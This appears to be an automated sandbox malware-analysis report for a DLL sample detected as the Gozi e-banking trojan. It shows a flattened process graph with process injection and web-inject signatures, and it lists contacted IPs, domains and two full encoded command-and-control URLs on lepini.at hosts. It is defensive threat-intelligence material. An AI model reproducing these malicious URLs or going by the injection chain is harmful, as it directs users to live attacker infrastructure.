behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 352230 Sample: 2200.dll Startdate: 12/02/2021 Architecture: WINDOWS Score: 100 66 c56.lepini.at 2->66 68 resolver1.opendns.com 2->68 70 api3.lepini.at 2->70 80 Multi AV Scanner detection for domain / URL 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 5 other signatures 2->86 10 loaddll32.exe 1 2->10         started        12 mshta.exe 19 2->12         started        signatures3 process4 signatures5 15 regsvr32.exe 10->15         started        18 cmd.exe 1 10->18         started        98 Suspicious powershell command line found 12->98 20 powershell.exe 12->20         started        process6 file7 100 Detected Gozi e-Banking trojan 15->100 102 Writes to foreign memory regions 15->102 104 Allocates memory in foreign processes 15->104 108 4 other signatures 15->108 23 control.exe 15->23         started        26 iexplore.exe 1 87 18->26         started        58 C:\Users\user\AppData\...\ljarxop3.cmdline, UTF-8 20->58 dropped 60 C:\Users\user\AppData\Local\...\huo1uow1.0.cs, UTF-8 20->60 dropped 106 Compiles code for process injection (via .Net compiler) 20->106 28 explorer.exe 20->28 injected 30 csc.exe 20->30         started        33 csc.exe 20->33         started        35 conhost.exe 20->35         started        signatures8 process9 file10 88 Changes memory attributes in foreign processes to executable or writable 23->88 90 Writes to foreign memory regions 23->90 92 Allocates memory in foreign processes 23->92 96 3 other signatures 23->96 37 rundll32.exe 23->37         started        39 iexplore.exe 164 26->39         started        42 iexplore.exe 29 26->42         started        44 iexplore.exe 29 26->44         started        46 iexplore.exe 29 26->46         started        94 Disables SPDY (HTTP compression, likely to perform web injects) 28->94 48 cmd.exe 28->48         started        50 RuntimeBroker.exe 28->50 injected 62 C:\Users\user\AppData\Local\...\ljarxop3.dll, PE32 30->62 dropped 52 cvtres.exe 30->52         started        64 C:\Users\user\AppData\Local\...\huo1uow1.dll, PE32 33->64 dropped 54 cvtres.exe 33->54         started        signatures11 process12 dnsIp13 72 img.img-taboola.com 39->72 74 edge.gycpi.b.yahoodns.net 87.248.118.23, 443, 49732, 49733 YAHOO-DEBDE United Kingdom 39->74 78 10 other IPs or domains 39->78 76 api10.laptok.at 35.228.31.40, 49762, 49763, 49764 GOOGLEUS United States 42->76 56 conhost.exe 48->56         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.20.185.68
unknown United States
13335 CLOUDFLARENETUS false
35.228.31.40
unknown United States
15169 GOOGLEUS true
87.248.118.23
unknown United Kingdom
203220 YAHOO-DEBDE false
151.101.1.44
unknown United States
54113 FASTLYUS false

Contacted Domains

Name IP Active
contextual.media.net 184.30.24.22 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 184.30.24.22 true
c56.lepini.at 35.228.31.40 true
lg3.media.net 184.30.24.22 true
resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 35.228.31.40 true
geolocation.onetrust.com 104.20.185.68 true
edge.gycpi.b.yahoodns.net 87.248.118.23 true
api10.laptok.at 35.228.31.40 true
www.msn.com unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
s.yimg.com unknown unknown
web.vortex.data.msn.com unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api3.lepini.at/api1/RIcDr3iQ_2F5HIV/n8436tIkJR8PrSjzuD/qVR2EWMqX/JHao30Cb5Ma6tPeJDvP0/Qpt0UP3yCDsC9Fp5cQv/WC3luav8wdMdeqfAWIs0lT/3HapmLJEH6Sr8/S94_2BZ_/2FhcJtKqyYatNIzqU2kqw4R/i383XEDNfh/7iCEha60plcDi0Gsi/YkbbHV8lpXBQ/om0NF0vi0Aw/RyBEHsBgFlPiJM/CB37HmU2lDcIAsK_2BgfJ/DHyfteBHJ3c0Jp8g/vCwxsQxKg_2FRoX/tZDGwkMH_2FCJ5tFJ3/Imp5riyeK/ktUBEA1N01Clwu/a3KCmmi false
  • Avira URL Cloud: safe
unknown
http://api3.lepini.at/api1/9tgtwLjb0tU0zx/gjkgUIt_2BDAbjs0GmiGf/jGKajlUv_2BCCAvj/GG7iDRArA8IwTDs/umyhHUUFxniPZSwiB1/Esmzl052W/VaAuas8dozcem21MrIfi/9YUq_2BOx3S4HJ73aAi/Vs0wStZxRwr04db1SG2ZhF/SDvfPYnIQuY21/wpQuP8zD/NKJ8gswNFYPlJUNd52s2mHl/F5u4SKY7Sb/kxNMhGHUlS6M7up7O/RKp4_2FZDHjQ/JbZOJmdSxil/58gaA96_2FkxAQ/MNrt1jQAMrd60eL4xAxxk/XtosXkxYrgp_2FaY/c1Ab0uIAwuv/A false
  • Avira URL Cloud: safe
unknown